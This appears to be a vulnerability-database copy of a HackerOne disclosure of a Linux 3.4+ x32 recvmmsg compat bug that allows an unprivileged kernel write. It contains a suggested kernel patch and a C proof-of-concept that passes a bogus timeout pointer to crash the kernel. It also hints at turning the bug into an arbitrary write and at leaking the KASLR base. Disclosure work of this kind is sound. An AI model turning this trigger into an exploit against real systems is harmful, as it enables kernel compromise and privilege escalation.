Lucene search

K
hackerone · pageexec · H1:960
History: Jan 28, 2014 - 11:52 p.m.

Sandbox Escape: Linux 3.4+: arbitrary write with CONFIG_X86_X32

2014-01-28 23:52:58
pageexec
hackerone.com
$3000
26

6.9 Medium

CVSS2

Access Vector

LOCAL

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:L/AC:M/Au:N/C:C/I:C/A:C

0.0004 Low

EPSS

Percentile

0.4%

asmlinkage long compat_sys_recvmmsg(int fd, struct compat_mmsghdr __user *mmsg,
                                    unsigned int vlen, unsigned int flags,
                                    struct compat_timespec __user *timeout)
{
        int datagrams;
        struct timespec ktspec;

        if (flags & MSG_CMSG_COMPAT)
                return -EINVAL;

        if (COMPAT_USE_64BIT_TIME)
                return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,
                                      flags | MSG_CMSG_COMPAT,
                                      (struct timespec *) timeout);
/*...*/

The timeout pointer parameter is provided by userland (hence the __user annotation), but for x32 syscalls it’s simply cast to a kernel pointer and passed to __sys_recvmmsg, which will eventually dereference it directly for both reading and writing. Other callers of __sys_recvmmsg properly copy the timespec from userland into the kernel first.

The impact is a sort of arbitrary kernel write-what-where primitive for unprivileged users, with the constraint that the to-be-written area must initially contain valid timespec data (the first 64-bit long field must be positive and the second one must be < 1G).

The bug was introduced by commit http://git.kernel.org/linus/ee4fa23c4b (other uses of COMPAT_USE_64BIT_TIME seem fine) and should affect all kernels since 3.4 (and perhaps vendor kernels, if they backported x32 support along with this code). Note that CONFIG_X86_X32_ABI gets enabled at build time, and only if CONFIG_X86_X32 is enabled and ld can build x32 executables.

Suggested fix:
Signed-off-by: PaX Team <pageexec@…email.hu>

--- a/net/compat.c  2014-01-20 12:36:54.372997752 +0100
+++ b/net/compat.c      2014-01-28 02:06:59.265506171 +0100
@@ -780,22 +780,25 @@
        if (flags & MSG_CMSG_COMPAT)
                return -EINVAL;

-       if (COMPAT_USE_64BIT_TIME)
-               return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,
-                                     flags | MSG_CMSG_COMPAT,
-                                     (struct timespec *) timeout);
-
        if (timeout == NULL)
                return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,
                                      flags | MSG_CMSG_COMPAT, NULL);

-       if (get_compat_timespec(&ktspec, timeout))
+       if (COMPAT_USE_64BIT_TIME) {
+               if (copy_from_user(&ktspec, timeout, sizeof(ktspec)))
+                       return -EFAULT;
+       } else if (get_compat_timespec(&ktspec, timeout))
                return -EFAULT;

        datagrams = __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,
                                   flags | MSG_CMSG_COMPAT, &ktspec);
-       if (datagrams > 0 && put_compat_timespec(&ktspec, timeout))
-               datagrams = -EFAULT;
+       if (datagrams > 0) {
+               if (COMPAT_USE_64BIT_TIME) {
+                       if (copy_to_user(timeout, &ktspec, sizeof(ktspec)))
+                               datagrams = -EFAULT;
+               } else if (put_compat_timespec(&ktspec, timeout))
+                       datagrams = -EFAULT;
+       }

        return datagrams;
 }

So I couldn’t help it and created a simple PoC trigger based on the example in the manpage. As it is, it’ll just trigger a null-deref oops on the read side:

BUG: unable to handle kernel NULL pointer dereference at 0000000000000009 IP: [<ffffffff82a333cb>] __sys_recvmmsg+0x3b/0x310

By passing an appropriate value for the timeout pointer one can trigger the write side too. By the way, this also allows scanning the kernel address space and even revealing the KASLR base (try every 2MB; if there is no oops, you have found the kernel), no doubt to Kees’ delight :).

/*
 * PoC trigger for the linux 3.4+ recvmmsg x32 compat bug, based on the manpage
 *
 * https://code.google.com/p/chromium/issues/detail?id=338594
 *
 * $ while true; do echo $RANDOM > /dev/udp/127.0.0.1/1234; sleep 0.25; done
 */

#define _GNU_SOURCE
#include <netinet/ip.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>
#include <sys/syscall.h>

#define __X32_SYSCALL_BIT 0x40000000
#undef __NR_recvmmsg
#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)

/*
 * PoC entry point: issue a recvmmsg system call with a bogus timeout pointer.
 *
 * Binds a UDP socket to 127.0.0.1:1234, prepares VLEN receive buffers of
 * BUFSIZE bytes each, then calls syscall(__NR_recvmmsg, ...) directly with
 * (void *)1 as the timeout argument instead of a real struct timespec.
 *
 * If the call returns normally, the received datagrams are printed and the
 * process exits with EXIT_SUCCESS.  Any socket(), bind() or recvmmsg()
 * failure is reported through perror() and exits with EXIT_FAILURE.
 */
int
main(void)
{
#define VLEN 10
#define BUFSIZE 200
#define TIMEOUT 1
    int sockfd, retval, i;
    struct sockaddr_in sa;
    struct mmsghdr msgs[VLEN];
    struct iovec iovecs[VLEN];
    char bufs[VLEN][BUFSIZE+1];     /* +1 leaves room for the NUL added below */
    struct timespec timeout;

    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd == -1) {
        perror("socket()");
        exit(EXIT_FAILURE);
    }

    /* Clear the whole address first so its padding bytes are not stack garbage. */
    memset(&sa, 0, sizeof(sa));
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port = htons(1234);
    if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
        perror("bind()");
        exit(EXIT_FAILURE);
    }

    /* One single-element iovec per message header, each backed by its own buffer. */
    memset(msgs, 0, sizeof(msgs));
    for (i = 0; i < VLEN; i++) {
        iovecs[i].iov_base         = bufs[i];
        iovecs[i].iov_len          = BUFSIZE;
        msgs[i].msg_hdr.msg_iov    = &iovecs[i];
        msgs[i].msg_hdr.msg_iovlen = 1;
    }

    /* Only consumed by the well-behaved reference calls kept below. */
    timeout.tv_sec = TIMEOUT;
    timeout.tv_nsec = 0;

    /*
     * Well-behaved variants, kept for comparison:
     *
     *     retval = recvmmsg(sockfd, msgs, VLEN, 0, &timeout);
     *     retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, &timeout);
     *
     * The live call passes the deliberately invalid pointer value 1 as the
     * timeout; that bogus pointer is the whole point of this trigger.
     */
    retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)1ul);
    if (retval == -1) {
        perror("recvmmsg()");
        exit(EXIT_FAILURE);
    }

    printf("%d messages received\n", retval);
    for (i = 0; i < retval; i++) {
        /* NUL-terminate each datagram so it can be printed with %s. */
        bufs[i][msgs[i].msg_len] = 0;
        printf("%d %s", i+1, bufs[i]);
    }
    exit(EXIT_SUCCESS);
}

6.9 Medium

CVSS2

Access Vector

LOCAL

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:L/AC:M/Au:N/C:C/I:C/A:C

0.0004 Low

EPSS

Percentile

0.4%